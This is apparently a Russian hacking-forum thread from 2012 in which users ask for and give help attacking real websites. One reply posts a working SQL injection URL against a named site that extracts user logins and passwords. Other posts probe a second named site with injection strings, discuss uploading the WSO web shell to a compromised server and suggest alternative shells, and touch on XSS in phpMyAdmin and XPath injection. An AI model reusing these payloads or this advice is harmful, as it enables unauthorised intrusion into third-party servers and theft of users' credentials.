03.09.2012, 03:52
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
С нами:
9505375
Репутация:
19
|
|
Приветствую! Есть слепая скуля на MS SQL Server'е... можно ли как-нить читать файлики на сервере, юзая блинд? права SYSTEM
|
|
|
03.09.2012, 08:43
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
С нами:
8603990
Репутация:
0
|
|
Ошибки следующего вида при подставлении ' в строку
http://i.imgur.com/ZErAT.png
Но когда перебираю +UNION+SELECT+1,2,..+--+
Ничего не исчезает!
До 30ти перебирал.
Как раскрутить эту sql?
|
|
|
|
03.09.2012, 16:44
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от foma9999
Ошибки следующего вида при подставлении ' в строку
http://i.imgur.com/ZErAT.png
Но когда перебираю +UNION+SELECT+1,2,..+--+
Ничего не исчезает!
До 30ти перебирал.
Как раскрутить эту sql?
пантамимой не занимаемся, скиньте URL или не задавайте подобные вопросы на которые просто не возможно ответить
|
|
|
|
03.09.2012, 16:55
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
С нами:
9318329
Репутация:
394
|
|
foma9999,
Код:
http://www.advis.ru/gotovye-issledovaniya/page.php?ID=-20839'+union+select+1,group_concat(login,0x3a,password),3,4,5,6,7,8,9,0,11,concat_ws(0x3a,version(),user(),database()),13,14,15,16,17,18,19,20,21,22+from+users--+
|
|
|
|
04.09.2012, 20:54
|
|
Новичок
Регистрация: 17.08.2012
Сообщений: 2
С нами:
7229846
Репутация:
0
|
|
Сообщение от M_script
Сообщи администрации лагеря об уязвимости и получи бесплатную путевку на следующий сезон.
Спасибо тебе за дружеский совет ,
но я интересуюсь не для нажива ради, а только с целью научиться что делать в подобных ситуациях, в данном случае Артек подвернулся под руку...
|
|
|
|
05.09.2012, 14:35
|
|
Новичок
Регистрация: 16.03.2012
Сообщений: 12
С нами:
7451606
Репутация:
0
|
|
phpmyadmin 3.3.8
Зашел на /pma/setup/index.php создал сервер с именем alert("like this")
Подскажите плиз как можно это использовать?
|
|
|
|
05.09.2012, 18:44
|
|
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
С нами:
7535126
Репутация:
1
|
|
залил на серв wso и на тебе:
Warning: gzinflate() has been disabled for security reasons in путь : regexp code on line 1
первый раз с таким сталкиваюсь , я так понял эта функция отключена(гуглил ,но не понял насколько эта функция критична для вебшелла) какой тогда шелл попробывать?
|
|
|
|
05.09.2012, 19:13
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 6
С нами:
8411065
Репутация:
4
|
|
blesse любой где не используется эта функция, wso не пакованный, c99, c100, r57, Safe0ver и тд..
|
|
|
|
07.09.2012, 17:41
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от LelouchMe
Ребят, а что тут? http://grandis.me/index.php?f=stat&act=pk&sid=1'+UNION+SELECT+1,2,3, 4,5,6,7,8,9,10,11+--+
это не скуля
|
|
|
|
09.09.2012, 18:21
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
С нами:
9505375
Репутация:
19
|
|
Сообщение от None
не подскажите,
msxml4.dll error '80004005'
A string literal was not closed.
/test3.asp, line 26
это SQL inj или просто стандартный ответ сервера на ошибочный ввод? В уязвимый параметр передаю "
это xpath inj, можно выдергивать данные из XML файлов... достаточно бесполезная уязвимость, т к вся более-менее "нужная" инфа хранится все-таки в бд....
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
